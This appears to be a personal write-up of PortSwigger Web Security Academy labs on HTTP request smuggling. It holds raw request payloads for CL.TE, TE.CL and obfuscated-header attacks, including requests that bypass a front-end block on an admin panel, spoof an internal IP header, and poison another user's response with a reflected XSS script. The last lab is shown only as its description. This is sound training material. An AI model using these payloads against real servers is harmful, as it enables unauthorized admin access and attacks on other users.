labs
Lab - 1: HTTP request smuggling, basic CL.TE vulnerability (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.
send this request twice
POST / HTTP/1.1
Host: 0a540036047255c3c3ba1b66004300fe.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
front end server will accept all and back end will execute only 0 and G is left for the first request and G is appended to the second request and will get an error
Lab - 2: HTTP request smuggling, basic TE.CL vulnerability (P)
This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.
POST / HTTP/1.1
Host: 0ae3007c043a9f14c0d3485f00be006d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Two
Enter
after 0 is important.
Lab - 3: HTTP request smuggling, obfuscating the TE header (P)
This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.
POST / HTTP/1.1
Host: 0a0a00840493184ac0ff04e2006f00db.web-security-academy.net
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Transfer-Encoding: xchunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
How to find
Lab - 4: HTTP request smuggling, confirming a CL.TE vulnerability via differential responses (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.
POST / HTTP/1.1
Host: 0af100d70385f333c058ad5600e2006b.web-security-academy.net
Content-Type: application/x-www-url-encoded
Content-Length: 49
Transfer-Encoding: chunked
Connection: keep-alive
e
q=smuggling&x=
0
GET /404 HTTP/1.1
Foo: x
Lab - 5: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses (P)
This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.
POST / HTTP/1.1
Host: 0a2e00ff03831e78c0cdfb08007d0015.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
9e
GET /404 HTTP/1.1
Host: 0a2e00ff03831e78c0cdfb08007d0015.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
x=
0
How to exploit
Lab - 6: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. There's an admin panel at /admin, but the front-end server blocks access to it. To solve the lab, smuggle a request to the back-end server that accesses the admin panel and deletes the user carlos.
Try with
POST / HTTP/1.1
Host: 0a580008041199f1c0149c21007c00cb.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Foo: x
get 401 unauthorized
POST / HTTP/1.1
Host: 0a580008041199f1c0149c21007c00cb.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Foo: x
Duplicate header names are not allowed
POST / HTTP/1.1
Host: 0a580008041199f1c0149c21007c00cb.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
get the admin panel
change the
GET /admin/delete?username=carlos
to solve the lab
Lab - 7: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability (P)
This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. There's an admin panel at /admin, but the front-end server blocks access to it. To solve the lab, smuggle a request to the back-end server that accesses the admin panel and deletes the user carlos.
POST / HTTP/1.1
Host: 0a4500fe0382d950c0fda60a000d0074.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
x=4
0
front end is TE and send all the requests to the backend
backend is CL and in the first request, until 87 is processed and the rest are remained for the next round
87 is hexadecimal which is 135 characters from GET /admin/... to x=4
Lab - 8: Exploiting HTTP request smuggling to reveal front-end request rewriting (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. There's an admin panel at /admin, but it's only accessible to people with the IP address 127.0.0.1. The front-end server adds an HTTP header to incoming requests containing their IP address. It's similar to the X-Forwarded-For header but has a different name. To solve the lab, smuggle a request to the back-end server that reveals the header that is added by the front-end server. Then smuggle a request to the back-end server that includes the added header, accesses the admin panel, and deletes the user carlos.
first test whether it is CL.TE or TE.CL and found that it is CL.TE
there is a search parameter in POST request and reflect back
to find which Header is responsible for IP address
POST / HTTP/1.1
Host: 0a2f0099043dcdb4c0540ef900180013.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Host: 0a2f0099043dcdb4c0540ef900180013.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
search=
and found that
<h1>
0 search results for 'POST / HTTP/1.1 X-emLLFy-Ip: 117.55.250.47 Host:
0a2f0099043dcdb4c0540ef900180013.web-security-academy.net Connection:
keep-alive Content-Type: application/x-www-form-urlencoded Content-Le'
</h1>
after trying a little bit
POST / HTTP/1.1
Host: 0a2f0099043dcdb4c0540ef900180013.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
X-emLLFy-Ip: 127.0.0.1
Content-Length: 10
x=
Lab - 9: Exploiting HTTP request smuggling to deliver reflected XSS (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. The application is also vulnerable to reflected XSS via the User-Agent header. To solve the lab, smuggle a request to the back-end server that causes the next user's request to receive a response containing an XSS exploit that executes alert(1).
first test whether it is CL.TE or TE.CL and found that it is CL.TE
reflected XSS at blog post
GET /post?postId=6 HTTP/1.1
Host: 0a2c00dc04f32b66c0ca5d6a00a1007f.web-security-academy.net
Cookie: session=9f2vhd8TNaAfhvoCf8KskhVhpn7kIVeJ
User-Agent: "/><script>alert(1)</script>
...
POST / HTTP/1.1
Host: 0a2c00dc04f32b66c0ca5d6a00a1007f.web-security-academy.net
User-Agent: a'<script>alert(1)%3b</script>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Transfer-Encoding: chunked
0
GET /post?postId=6 HTTP/1.1
Host: 0a2c00dc04f32b66c0ca5d6a00a1007f.web-security-academy.net
Cookie: session=9f2vhd8TNaAfhvoCf8KskhVhpn7kIVeJ
User-Agent: "/><script>alert(1)</script>
Foo: x
Lab - 10: H2.CL request smuggling (P)
This lab is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even if they have an ambiguous length.
To solve the lab, perform a request smuggling attack that causes the victim's browser to load a malicious JavaScript file from the exploit server and call alert(document.cookie). The victim user accesses the home page every 10 seconds.
Last updated